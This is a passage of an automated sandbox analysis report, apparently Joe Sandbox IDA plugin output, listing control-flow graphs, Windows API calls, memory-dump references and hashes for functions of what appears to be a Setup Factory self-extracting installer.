                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$IncrementInterlockedlstrlen
                                                                                  • String ID: 99B2328D3FDF4E9E98559B4414F7ACB9$Constants$Failed to extract project file to memory.$Failed to find project file in archive.$Failed to get archive directory listing.$Invalid data format.$_TUProj.dat
                                                                                  • API String ID: 1619145733-2421911828
                                                                                  • Opcode ID: 006a6ce63afa65757179c7e049afe961861d4a990310da25f355e632bc3db91f
                                                                                  • Instruction ID: 302a50a406c6853073e14327f6ecddda8bc1a931f27a8181bff283ac9fe85d68
                                                                                  • Opcode Fuzzy Hash: 006a6ce63afa65757179c7e049afe961861d4a990310da25f355e632bc3db91f
                                                                                  • Instruction Fuzzy Hash: 84C1B97490425DEFDF14EBA5C991FEDBBB4AF14308F10409EE50663282DB782B49CB66
                                                                                  Function 004BFAC3 Relevance: 13.7, APIs: 9, Instructions: 221COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1100 4bfac3-4bfaf4 1101 4bfb36-4bfb3b 1100->1101 1102 4bfaf6-4bfb09 CompareStringW 1100->1102 1105 4bfb4d-4bfb50 1101->1105 1106 4bfb3d-4bfb4a call 4bfd40 1101->1106 1103 4bfb0b-4bfb11 1102->1103 1104 4bfb13-4bfb26 CompareStringA 1102->1104 1103->1101 1109 4bfd2c 1104->1109 1110 4bfb2c 1104->1110 1107 4bfb62-4bfb6a 1105->1107 1108 4bfb52-4bfb5f call 4bfd40 1105->1108 1106->1105 1114 4bfb6c-4bfb82 CompareStringA 1107->1114 1115 4bfb87-4bfb89 1107->1115 1108->1107 1112 4bfd2e-4bfd3f 1109->1112 1110->1101 1114->1112 1115->1109 1118 4bfb8f-4bfb92 1115->1118 1119 4bfb9c-4bfb9e 1118->1119 1120 4bfb94-4bfb99 1118->1120 1121 4bfba9-4bfbac 1119->1121 1122 4bfba0-4bfba3 1119->1122 1120->1119 1124 4bfbae 1121->1124 1125 4bfbb6-4bfbb9 1121->1125 1122->1121 1123 4bfc41-4bfc57 MultiByteToWideChar 1122->1123 1123->1109 1126 4bfc5d-4bfc93 call 4af620 1123->1126 1127 4bfbb0-4bfbb1 1124->1127 1128 4bfbbb-4bfbbd 1125->1128 1129 4bfbc2-4bfbc4 1125->1129 1126->1109 1139 4bfc99-4bfcb1 MultiByteToWideChar 1126->1139 1127->1112 1128->1112 1130 4bfc07-4bfc09 1129->1130 1131 4bfbc6-4bfbd5 GetCPInfo 1129->1131 1130->1127 1131->1109 1133 4bfbdb-4bfbdd 1131->1133 1135 4bfc0b-4bfc0e 1133->1135 1136 4bfbdf-4bfbe3 1133->1136 1135->1123 1140 4bfc10-4bfc14 1135->1140 1136->1130 1138 4bfbe5-4bfbeb 1136->1138 1138->1130 1141 4bfbed-4bfbf2 1138->1141 1139->1109 1142 4bfcb3-4bfcc9 MultiByteToWideChar 1139->1142 1140->1128 1143 4bfc16-4bfc1c 1140->1143 1141->1130 1144 4bfbf4-4bfbfb 1141->1144 1142->1109 1145 4bfccb-4bfcfd call 4af620 1142->1145 1143->1128 1146 4bfc1e-4bfc23 1143->1146 1147 4bfbfd-4bfbff 1144->1147 1148 4bfc01-4bfc05 1144->1148 1145->1109 1156 4bfcff-4bfd14 MultiByteToWideChar 1145->1156 1146->1128 1150 4bfc25-4bfc2c 1146->1150 1147->1124 1147->1148 1148->1130 1148->1141 1152 4bfc2e-4bfc30 1150->1152 1153 4bfc36-4bfc3a 1150->1153 1152->1124 1152->1153 1153->1146 1154 4bfc3c 1153->1154 1154->1128 1156->1109 1157 4bfd16-4bfd2a CompareStringW 1156->1157 1157->1112
                                                                                  APIs
                                                                                  • CompareStringW.KERNEL32(00000000,00000000,004EF9B4,00000001,004EF9B4,00000001,00000000,021F112C,004BAE64,0000000C,?,?,?,0000000B,0000000B), ref: 004BFB01
                                                                                  • CompareStringA.KERNEL32(00000000,00000000,004EF9B0,00000001,004EF9B0,00000001,?,004B966F), ref: 004BFB1E
                                                                                  • CompareStringA.KERNEL32(?,?,00000000,004B966F,?,0000000B,00000000,021F112C,004BAE64,0000000C,?,?,?,0000000B,0000000B), ref: 004BFB7C
                                                                                  • GetCPInfo.KERNEL32(0000000B,00000000,00000000,021F112C,004BAE64,0000000C,?,?,?,0000000B,0000000B,?,004B966F), ref: 004BFBCD
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0000000B,00000000,00000000,?,004B966F), ref: 004BFC4C
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,004B966F), ref: 004BFCAD
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,004B966F), ref: 004BFCC0
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,004B966F), ref: 004BFD0C
                                                                                  • CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,004B966F), ref: 004BFD24
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharCompareMultiStringWide$Info
                                                                                  • String ID:
                                                                                  • API String ID: 1651298574-0
                                                                                  • Opcode ID: dad2422ca71f20b4a1cd3fea243d0b810a61f9ef7896ae16423a75d182ecdf0f
                                                                                  • Instruction ID: a8aad5c9c205343b301ea8a997d585f4a96d087c362770444a76b30c4118357b
                                                                                  • Opcode Fuzzy Hash: dad2422ca71f20b4a1cd3fea243d0b810a61f9ef7896ae16423a75d182ecdf0f
                                                                                  • Instruction Fuzzy Hash: 2471A032904149AFDF219FA4DC819EF7FBAEB05350F14403BF859A6261C3399C59DBA8
                                                                                  Function 004146D6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65stringCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1158 4146d6-41470a call 4aef44 SHGetSpecialFolderLocation 1161 41477a-4147a4 call 4c5c1f call 4c5eaa 1158->1161 1162 41470c-41471e SHGetPathFromIDList 1158->1162 1162->1161 1164 414720-414757 SHGetMalloc lstrlen 1162->1164 1170 414759-414762 lstrlen 1164->1170 1171 41476a-414779 call 4c6033 1164->1171 1170->1171 1171->1161
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004146DB
                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,?,?), ref: 00414702
                                                                                  • SHGetPathFromIDList.SHELL32(?,?), ref: 00414716
                                                                                  • SHGetMalloc.SHELL32(?), ref: 00414725
                                                                                  • lstrlen.KERNEL32(?), ref: 0041474D
                                                                                  • lstrlen.KERNEL32(?), ref: 00414760
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$FolderFromH_prologListLocationMallocPathSpecial
                                                                                  • String ID: \
                                                                                  • API String ID: 4038027158-2967466578
                                                                                  • Opcode ID: 5701878784d629f0add4754a3be26b0c9b6d3e6f361d898f4130899165ecca45
                                                                                  • Instruction ID: bd4be8ed53d18429bd16d9bde03e8ea592aa461e643e342b25d5e2a4b64d4840
                                                                                  • Opcode Fuzzy Hash: 5701878784d629f0add4754a3be26b0c9b6d3e6f361d898f4130899165ecca45
                                                                                  • Instruction Fuzzy Hash: D821693190011DAFDB04DFA4D889BEEBBB8EF48304F10806AE915E7281D7349A45CF94
                                                                                  Function 00479FB0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 167COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00479FB5
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0047A22E: __EH_prolog.LIBCMT ref: 0047A233
                                                                                  • GetFileAttributesA.KERNELBASE(?,.dat,00000000,?,00000000,0000002E,00523C88,?,?,?,00000000,00514880,/DATFILE,00523A30,00510870), ref: 0047A17F
                                                                                    • Part of subcall function 004C279E: __EH_prolog.LIBCMT ref: 004C27A3
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  • GetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,?,00000000,00514880,/DATFILE,00523A30,00510870,?,00000000,_ir_tu2_temp,?), ref: 0047A072
                                                                                  • GetFileAttributesA.KERNEL32(?,?,00510870,00510870,00523C84,?,00000000,00514880,/DATFILE,00523A30,00510870,?,00000000,_ir_tu2_temp,?,?), ref: 0047A0CD
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFileH_prologInterlocked$Increment$Decrementlstrlen
                                                                                  • String ID: .dat$/DATFILE
                                                                                  • API String ID: 2903078539-3734404335
                                                                                  • Opcode ID: 422077f05ffd68f1cfd918d373ffc439308f2974d8bc47cbcf6cda247729fb8d
                                                                                  • Instruction ID: f39ebca024d9f9070bbb9e426eb7b52e45bccf392c95d3adb7dd4dc9415a9ae8
                                                                                  • Opcode Fuzzy Hash: 422077f05ffd68f1cfd918d373ffc439308f2974d8bc47cbcf6cda247729fb8d
                                                                                  • Instruction Fuzzy Hash: B261A078C00259DACF04EBA5C985EEEBBB4EF54308F10855EE415B3281DB786B49CB65
                                                                                  Function 0040CA76 Relevance: 10.6, APIs: 7, Instructions: 134COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1316 40ca76-40caee call 4aef44 call 4c2dd9 call 4c2ce2 call 4c2ca0 call 4c2ce2 call 4c62ad GetCurrentDirectoryA call 4af060 1331 40caf4-40cafb 1316->1331 1332 40cbe9 1316->1332 1333 40cb52-40cb81 call 4c281a call 4af56e call 4c5eaa 1331->1333 1334 40cafd-40cb01 1331->1334 1335 40cbec-40cc16 SetCurrentDirectoryA call 4c5eaa 1332->1335 1351 40cbe3-40cbe7 1333->1351 1352 40cb83-40cb98 call 4c28c2 1333->1352 1334->1335 1336 40cb07-40cb0a 1334->1336 1336->1335 1339 40cb10-40cb1f 1336->1339 1342 40cb21-40cb24 1339->1342 1343 40cb48-40cb4b 1339->1343 1342->1343 1345 40cb26-40cb35 SetCurrentDirectoryA 1342->1345 1343->1336 1346 40cb4d 1343->1346 1345->1343 1348 40cb37-40cb45 CreateDirectoryA 1345->1348 1346->1335 1348->1343 1351->1335 1352->1335 1355 40cb9a-40cb9e 1352->1355 1355->1335 1356 40cba0-40cba3 1355->1356 1356->1335 1357 40cba5-40cbb4 1356->1357 1358 40cbb6-40cbb8 1357->1358 1359 40cbdc-40cbdf 1357->1359 1358->1359 1360 40cbba-40cbc9 SetCurrentDirectoryA 1358->1360 1359->1355 1361 40cbe1 1359->1361 1360->1359 1362 40cbcb-40cbd9 CreateDirectoryA 1360->1362 1361->1335 1362->1359
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040CA7B
                                                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,0000005C,0000005C,?,00000000,00510870), ref: 0040CACE
                                                                                  • SetCurrentDirectoryA.KERNELBASE(?,?,00000000,00510870), ref: 0040CB2D
                                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,?,00000000,00510870), ref: 0040CB3F
                                                                                  • SetCurrentDirectoryA.KERNEL32(?,00510870,00000002,?,00000002,?,00000000,00510870), ref: 0040CBC1
                                                                                  • CreateDirectoryA.KERNEL32(?,00000000,?,00000000,00510870), ref: 0040CBD3
                                                                                  • SetCurrentDirectoryA.KERNELBASE(?,?,00000000,00510870), ref: 0040CBF3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Directory$Current$Create$H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 291296761-0
                                                                                  • Opcode ID: 40716f3851980a4ba98cea04baad11c2702fb2dff45ffb58a33ae0b8bd074f5f
                                                                                  • Instruction ID: b004479bdaab3d3bd829a467c65cd02cbc0d56440a2eb029a2dbf14c7f884d89
                                                                                  • Opcode Fuzzy Hash: 40716f3851980a4ba98cea04baad11c2702fb2dff45ffb58a33ae0b8bd074f5f
                                                                                  • Instruction Fuzzy Hash: 7041A935900218DBCB10EFA4D8C6BEEBB78AB10744F00467BF955E71C1D778AA85CB94
                                                                                  Function 004CB66C Relevance: 9.0, APIs: 6, Instructions: 35COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 004CB679
                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 004CB680
                                                                                  • GetDC.USER32(00000000), ref: 004CB699
                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 004CB6AA
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004CB6B2
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004CB6BA
                                                                                    • Part of subcall function 004D4BDB: GetSystemMetrics.USER32(00000002), ref: 004D4BED
                                                                                    • Part of subcall function 004D4BDB: GetSystemMetrics.USER32(00000003), ref: 004D4BF7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                  • String ID:
                                                                                  • API String ID: 1031845853-0
                                                                                  • Opcode ID: 728750b86aee9f3288ab1b03eaa7706f7e1acab1d4fc09a5825885b453dbf76d
                                                                                  • Instruction ID: bf57f687fb48ed17a37b73ff62f3306dad246145462785bd4eea27261f4cc86b
                                                                                  • Opcode Fuzzy Hash: 728750b86aee9f3288ab1b03eaa7706f7e1acab1d4fc09a5825885b453dbf76d
                                                                                  • Instruction Fuzzy Hash: 42F05B356407409BE7306B729C89F17B7A4EBD0755F11442FF6014A291D7749805CFA5
                                                                                  Function 0049A520 Relevance: 7.5, APIs: 5, Instructions: 33memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1370 49a520-49a52b 1371 49a52d-49a53e GlobalAlloc 1370->1371 1372 49a570-49a574 1370->1372 1371->1372 1373 49a540-49a550 TlsSetValue 1371->1373 1374 49a55a-49a56a GlobalHandle GlobalUnlock GlobalFree 1373->1374 1375 49a552-49a559 call 49a410 1373->1375 1374->1372
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNELBASE(00000040,000095B6,7591DF20,00000000,0049D7C5), ref: 0049A534
                                                                                  • TlsSetValue.KERNEL32(0000001C,00000000), ref: 0049A547
                                                                                  • GlobalHandle.KERNEL32(00000000), ref: 0049A55A
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0049A563
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0049A56A
                                                                                    • Part of subcall function 0049A410: lstrcpy.KERNEL32(?,Extract Progress), ref: 0049A50D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocFreeHandleUnlockValuelstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3074214269-0
                                                                                  • Opcode ID: ad5eafb15232a0ae981ad6d46a1e38cd29695636a21d119ecb29d975e902ee86
                                                                                  • Instruction ID: 9ecee854548e298bfa894226385df9751f7bea61e9a3219eb00d02fdc470e6e1
                                                                                  • Opcode Fuzzy Hash: ad5eafb15232a0ae981ad6d46a1e38cd29695636a21d119ecb29d975e902ee86
                                                                                  • Instruction Fuzzy Hash: A4F037367011706BDA215776BC4CD6B7B58DF957A17064131FE00D6251D7288C064AFD
                                                                                  Function 0046D587 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0046D58C
                                                                                    • Part of subcall function 00473444: __EH_prolog.LIBCMT ref: 00473449
                                                                                    • Part of subcall function 0046D05F: __EH_prolog.LIBCMT ref: 0046D064
                                                                                    • Part of subcall function 00416514: __EH_prolog.LIBCMT ref: 00416519
                                                                                    • Part of subcall function 0047A500: __EH_prolog.LIBCMT ref: 0047A505
                                                                                    • Part of subcall function 0046F10B: __EH_prolog.LIBCMT ref: 0046F110
                                                                                    • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$lstrlen
                                                                                  • String ID: 0:R$C:\temp\SUF_SFX_TEST\$Unknown
                                                                                  • API String ID: 3243491680-1928702690
                                                                                  • Opcode ID: e4fb1bd6c68590b33541bbf068c218ebf15c635fbe0dc572e3d93246bc3aa5c8
                                                                                  • Instruction ID: ee0e627ea49443941414baa93ca625601854cbfb75f8911bf55627c5179cec17
                                                                                  • Opcode Fuzzy Hash: e4fb1bd6c68590b33541bbf068c218ebf15c635fbe0dc572e3d93246bc3aa5c8
                                                                                  • Instruction Fuzzy Hash: C1515C74901B40DFD325DF6AC455BDAFBF4AF68304F00885FD4AA93252DBB86608DB22
                                                                                  Function 0049D0D0 Relevance: 6.2, APIs: 4, Instructions: 211fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1429 49d0d0-49d0e6 TlsGetValue 1430 49d0e8-49d0f3 1429->1430 1431 49d0f4-49d111 1429->1431 1432 49d211-49d229 1431->1432 1433 49d117-49d121 1431->1433 1434 49d22d-49d230 1432->1434 1435 49d153-49d1bc call 4a2ed0 ReadFile 1433->1435 1436 49d123-49d14d 1433->1436 1437 49d298-49d2a0 1434->1437 1438 49d232-49d296 call 4b4f70 1434->1438 1444 49d1fb-49d210 1435->1444 1445 49d1be-49d1c4 1435->1445 1436->1435 1441 49d2eb-49d2f3 1437->1441 1442 49d2a2 1437->1442 1438->1434 1438->1437 1446 49d2fe-49d30a 1441->1446 1447 49d2f5-49d2fc call 49d050 1441->1447 1442->1441 1449 49d2a9-49d2c1 1442->1449 1445->1444 1450 49d1c6-49d1e9 1445->1450 1452 49d30c-49d311 1446->1452 1453 49d373-49d37d 1446->1453 1447->1446 1461 49d36c-49d372 1447->1461 1454 49d2c3-49d2e2 1449->1454 1455 49d2e4 1449->1455 1450->1441 1456 49d1ef-49d1fa 1450->1456 1452->1453 1458 49d313-49d318 1452->1458 1459 49d329-49d332 call 4a2f90 1453->1459 1454->1441 1455->1441 1458->1453 1462 49d31a-49d327 call 4a23f0 1458->1462 1467 49d339-49d342 1459->1467 1468 49d334-49d337 1459->1468 1462->1459 1462->1467 1470 49d34b-49d353 1467->1470 1471 49d344-49d345 CloseHandle 1467->1471 1468->1467 1469 49d36a 1468->1469 1469->1461 1470->1469 1472 49d355-49d35a 1470->1472 1471->1470 1472->1469 1473 49d35c-49d361 1472->1473 1473->1469 1474 49d363-49d364 DeleteFileA 1473->1474 1474->1469
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,?,00000000,759234C0,?,?,0049F538,00000862), ref: 0049D0DC
                                                                                  • ReadFile.KERNELBASE(?,?,00002800,?,00000000,?,?,?,?,?,?,0049F538,00000862), ref: 0049D1B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileReadValue
                                                                                  • String ID:
                                                                                  • API String ID: 2860046521-0
